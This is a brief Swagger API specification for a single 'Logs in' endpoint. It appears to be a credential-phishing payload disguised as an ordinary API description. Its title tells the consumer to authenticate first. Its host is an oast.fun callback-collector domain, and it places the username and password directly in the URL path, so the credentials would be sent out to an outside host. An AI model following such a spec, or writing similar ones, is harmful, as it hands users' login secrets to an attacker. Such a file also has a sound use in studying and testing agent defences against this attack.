swagger: "2.0"
info:
  version: "v1"
  title: You must authenticate first before you can proceed.

host: ckrk57m2vtc0000g9pz0gjhj1uhyyyyyb.oast.fun

paths:

  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
